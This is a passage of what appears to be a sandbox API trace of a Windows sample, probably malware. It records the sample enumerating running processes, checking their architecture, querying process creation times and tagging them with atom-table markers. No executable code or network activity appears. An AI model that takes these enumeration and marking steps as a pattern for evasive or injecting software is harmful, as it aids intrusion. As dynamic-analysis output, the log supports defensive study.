	[0073.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.601] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.601] CloseHandle (hObject=0x224) returned 1
	[0073.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.601] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.601] CloseHandle (hObject=0x224) returned 1
	[0073.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.609] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.609] CloseHandle (hObject=0x224) returned 1
	[0073.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.609] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.609] CloseHandle (hObject=0x224) returned 1
	[0073.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.609] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.609] CloseHandle (hObject=0x224) returned 1
	[0073.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.610] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.610] CloseHandle (hObject=0x224) returned 1
	[0073.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728a18, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.610] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.610] CloseHandle (hObject=0x224) returned 1
	[0073.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.610] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.610] CloseHandle (hObject=0x224) returned 1
	[0073.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd20, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.610] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.610] CloseHandle (hObject=0x224) returned 1
	[0073.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.611] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.611] CloseHandle (hObject=0x224) returned 1
	[0073.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea18, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.611] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.611] CloseHandle (hObject=0x224) returned 1
	[0073.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728818, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.611] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.611] CloseHandle (hObject=0x224) returned 1
	[0073.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.611] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.611] CloseHandle (hObject=0x224) returned 1
	[0073.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.611] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.612] CloseHandle (hObject=0x224) returned 1
	[0073.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0073.612] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.612] CloseHandle (hObject=0x224) returned 1
	[0073.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.612] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.612] CloseHandle (hObject=0x224) returned 1
	[0073.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.612] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.612] CloseHandle (hObject=0x224) returned 1
	[0073.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.612] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.612] CloseHandle (hObject=0x224) returned 1
	[0073.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e7c0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.613] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.613] CloseHandle (hObject=0x224) returned 1
	[0073.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.613] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.613] CloseHandle (hObject=0x224) returned 1
	[0073.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.613] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.613] CloseHandle (hObject=0x224) returned 1
	[0073.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7288f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.613] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.613] CloseHandle (hObject=0x224) returned 1
	[0073.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.613] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.613] CloseHandle (hObject=0x224) returned 1
	[0073.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728a38, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.614] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.614] CloseHandle (hObject=0x224) returned 1
	[0073.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72eb08, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.614] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.614] CloseHandle (hObject=0x224) returned 1
	[0073.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72eb58, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.614] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.614] CloseHandle (hObject=0x224) returned 1
	[0073.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.614] GetLastError () returned 0x5
	[0073.614] GetLastError () returned 0x5
	[0073.614] GetLastError () returned 0x5
	[0073.614] GetLastError () returned 0x5
	[0073.614] GetLastError () returned 0x5
	[0073.614] GetLastError () returned 0x5
	[0073.614] GetLastError () returned 0x5
	[0073.614] GetLastError () returned 0x5
	[0073.614] GetLastError () returned 0x5
	[0073.614] GetLastError () returned 0x5
	[0073.614] GetLastError () returned 0x5
	[0073.614] GetLastError () returned 0x5
	[0073.614] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetLastError () returned 0x5
	[0073.615] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.616] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.616] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.616] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.617] GetLastError () returned 0x5
	[0073.618] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.618] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.618] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.618] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.618] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.618] CloseHandle (hObject=0x224) returned 1
	[0073.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.618] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.618] CloseHandle (hObject=0x224) returned 1
	[0073.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea90, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.619] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.619] CloseHandle (hObject=0x224) returned 1
	[0073.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0073.659] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
